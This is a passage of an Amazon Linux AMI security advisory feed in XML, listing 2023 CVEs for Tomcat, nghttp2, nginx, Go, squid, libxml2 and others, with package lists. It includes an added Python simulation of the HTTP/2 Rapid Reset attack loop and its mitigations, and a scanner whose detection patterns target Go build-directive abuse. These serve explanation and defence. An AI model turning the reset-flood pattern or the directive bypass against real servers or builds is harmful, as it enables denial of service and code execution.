Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVE-2023-42795:
Incomplete Cleanup vulnerability in Apache Tomcat. When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42795" title="" id="CVE-2023-42795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45648" title="" id="CVE-2023-45648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-lib" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.94" release="1.95.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-webapps-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1869</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1869: important priority package update for nghttp2</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1870</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1870: important priority package update for nginx</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:09:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.45.amzn1" epoch="1" 
arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1871</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1871: important priority package update for golang</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVE-2023-39325:
Go's HTTP/2 server implementation (net/http and golang.org/x/net/http2) was affected by the same Rapid Reset attack as CVE-2023-44487: a malicious client that rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of open streams is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request lets the attacker open a new stream while the handler for the reset one is still executing. With the fix applied, the server bounds the number of simultaneously executing handler goroutines to the stream concurrency limit, queues requests that arrive at the limit until a handler exits, and terminates the connection if that queue grows too large. The default stream concurrency limit is 250 streams per HTTP/2 connection.
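How the reset-then-reopen loop defeats a plain stream limit, and the two mitigations that stop it, as an added Python simulation that is not Go's, nghttp2's or nginx's code (it also serves the CVE-2023-44487 entries for tomcat8, nghttp2 and nginx above). `NaiveServer` models the pre-fix behaviour, `FixedServer` the bounded-handler queue described for Go, and `ResetRateLimiter` a per-connection cap on RST_STREAM frames; `HANDLER_COST`, the 2000-request burst and the limiter thresholds are constructed for the simulation.
<![CDATA[
```python
from collections import deque
from dataclasses import dataclass, field

MAX_CONCURRENT_STREAMS = 250   # Go's default per-connection limit, as stated in the advisory
HANDLER_COST = 10_000          # constructed: handlers are slow, so resets always outrun completion


@dataclass
class Handler:
    stream_id: int
    done_at: int


@dataclass
class NaiveServer:
    """Pre-fix behaviour: RST_STREAM frees the stream slot at once, but the handler keeps running."""
    open_streams: set = field(default_factory=set)
    running: list = field(default_factory=list)
    peak_running: int = 0

    def _start(self, sid: int, now: int) -> None:
        self.running.append(Handler(sid, now + HANDLER_COST))
        self.peak_running = max(self.peak_running, len(self.running))

    def on_headers(self, sid: int, now: int) -> str:
        if len(self.open_streams) >= MAX_CONCURRENT_STREAMS:
            return "refused"             # stream-level error; the connection stays up
        self.open_streams.add(sid)
        self._start(sid, now)
        return "running"

    def on_rst_stream(self, sid: int) -> None:
        self.open_streams.discard(sid)   # slot freed immediately; the goroutine is still working

    def tick(self, now: int) -> None:
        self.running = [h for h in self.running if h.done_at > now]


@dataclass
class FixedServer(NaiveServer):
    """Post-fix behaviour: executing handlers are capped at the stream limit, extra requests wait in
    a queue, and a reset drops a queued request. (Go also closes the connection when the queue grows
    too large; that branch is not modelled here.)"""
    queue: deque = field(default_factory=deque)

    def on_headers(self, sid: int, now: int) -> str:
        if len(self.open_streams) >= MAX_CONCURRENT_STREAMS:
            return "refused"
        self.open_streams.add(sid)
        if len(self.running) >= MAX_CONCURRENT_STREAMS:
            self.queue.append(sid)       # wait for a handler to exit instead of spawning another
            return "queued"
        self._start(sid, now)
        return "running"

    def on_rst_stream(self, sid: int) -> None:
        super().on_rst_stream(sid)
        if sid in self.queue:
            self.queue.remove(sid)       # never started, so there is nothing to cancel

    def tick(self, now: int) -> None:
        super().tick(now)
        while self.queue and len(self.running) < MAX_CONCURRENT_STREAMS:
            self._start(self.queue.popleft(), now)


class ResetRateLimiter:
    """The other common mitigation: cap RST_STREAM frames per connection per window and close the
    connection of any peer that exceeds it. Legitimate clients reset streams rarely."""

    def __init__(self, max_resets: int, window: int):
        self.max_resets, self.window = max_resets, window
        self.events = deque()

    def allow(self, now: int) -> bool:
        self.events.append(now)
        while self.events and self.events[0] <= now - self.window:
            self.events.popleft()
        return len(self.events) <= self.max_resets


def rapid_reset(server, requests: int = 2000) -> int:
    """Drive one connection with the attack: open a stream, reset it at once, repeat. Returns the
    peak number of handlers executing at the same time."""
    for i in range(requests):
        sid = 2 * i + 1                  # client-initiated stream ids are odd
        server.on_headers(sid, i)
        server.on_rst_stream(sid)
        server.tick(i)
    return server.peak_running


if __name__ == "__main__":
    print("naive peak handlers:", rapid_reset(NaiveServer()))   # 2000
    print("fixed peak handlers:", rapid_reset(FixedServer()))   # 250
```
]]>
The naive server never refuses a stream because the attacker keeps at most one open, so the only thing that bounds work is the attacker's patience; the fixed server does the same amount of protocol work but never runs more handlers than it advertised streams, and the reset client only ever gets its own queued entries thrown away.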
CVE-2023-39323:
Line directives ("//line") can be used to bypass the restrictions on "//go:cgo_" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running "go build". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.
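A pre-build check for the directives this CVE abuses, as an added Python example that is not part of the Go toolchain: scan a module's hand-written sources for `//go:cgo_*` and `//line` directives, which are rare outside generated code and worth a human look before `go build` runs on third-party code. The two Go source strings are constructed for this example; the directive spellings are the real ones. Note that cgo's own generated files normally live in the build work directory rather than the source tree, so a `//go:cgo_*` directive found in the tree is not explained by cgo.
<![CDATA[
```python
import re

# Directives the Go toolchain only accepts in cgo-generated code; hand-written source has no reason
# to carry them.
CGO_DIRECTIVE = re.compile(
    r"^\s*//go:cgo_(?:ldflag|import_dynamic|import_static|export_dynamic|export_static)\b"
)
# //line and /*line rewrite the file:line the compiler believes it is compiling, which is what the
# bypass in this CVE relies on.
LINE_DIRECTIVE = re.compile(r"^\s*(?://|/\*)line\s+\S")


def scan_go_source(path: str, text: str) -> list:
    """Return (path, line_no, reason, line) for every directive that deserves review before `go build`."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if CGO_DIRECTIVE.match(line):
            findings.append((path, number, "cgo directive in hand-written source", line.strip()))
        elif LINE_DIRECTIVE.match(line):
            findings.append((path, number, "line directive", line.strip()))
    return findings


def scan_module(files: dict) -> list:
    """Scan a {path: source} mapping of a module's .go files and return all findings sorted by path."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_go_source(path, text))
    return sorted(findings)


# Constructed sources for this example.
CLEAN_SRC = """package demo

import "fmt"

// Mentioning go:cgo_ldflag in ordinary prose is not a directive, so this line is fine.
func Hello() { fmt.Println("hello") }
"""

SUSPECT_SRC = """package demo

//line /home/build/src/demo/gen.go:1
//go:cgo_ldflag "-L/tmp/untrusted"
func init() {}
"""


if __name__ == "__main__":
    for path, number, reason, line in scan_module({"hello.go": CLEAN_SRC, "init.go": SUSPECT_SRC}):
        print(f"{path}:{number}: {reason}: {line}")
```
]]>
Run this over a dependency's sources (vendor tree or module cache) as a CI gate; a finding is not proof of an attack, since goyacc and similar generators emit `//line` legitimately, but it is exactly the small set of lines a reviewer should read before letting `go build` link the result.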
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39323" title="" id="CVE-2023-39323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39325" title="" id="CVE-2023-39325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-shared" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.20.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.20.10-1.48.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.20.10" release="1.48.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-bin-1.20.10-1.48.amzn1.i686.rpm</filename></package><package name="golang" version="1.20.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.10-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1872</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1872: critical priority package update for squid</title><issued date="2023-10-25 21:15:00" /><updated date="2023-11-06 21:16:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46847:
Due to a buffer overflow bug, Squid is vulnerable to a denial of service attack against HTTP Digest Authentication. This problem allows a remote client to perform a denial of service attack when Squid is configured to use HTTP Digest Authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46847" title="" id="CVE-2023-46847" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.50.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.50.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1873</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1873: low priority package update for shadow-utils</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4641:
A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks for the password twice. If the password fails on the second attempt, shadow-utils fails to clear the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4641" title="" id="CVE-2023-4641" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="shadow-utils" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/shadow-utils-4.1.4.2-13.11.amzn1.x86_64.rpm</filename></package><package name="shadow-utils-debuginfo" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/shadow-utils-debuginfo-4.1.4.2-13.11.amzn1.x86_64.rpm</filename></package><package name="shadow-utils" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="i686"><filename>Packages/shadow-utils-4.1.4.2-13.11.amzn1.i686.rpm</filename></package><package name="shadow-utils-debuginfo" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="i686"><filename>Packages/shadow-utils-debuginfo-4.1.4.2-13.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1874</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1874: important priority package update for libxml2</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45322:
libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is "I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail."
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45322" title="" id="CVE-2023-45322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1875</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1875: medium priority package update for libXpm</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43789:
libXpm: out of bounds read on XPM with corrupted colormap
CVE-2023-43787:
libX11: integer overflow in XCreateImage() leading to a heap overflow.
CVE-2023-43786:
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43786" title="" id="CVE-2023-43786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43787" title="" id="CVE-2023-43787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43789" title="" id="CVE-2023-43789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm-debuginfo" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.12.amzn1.x86_64.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.12.amzn1.i686.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.12.amzn1.i686.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1876</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1876: important priority package update for python27</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40217:
An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40217" title="" id="CVE-2023-40217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-devel" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.148.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.148.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.148.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.148.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.148.amzn1" epoch="0" 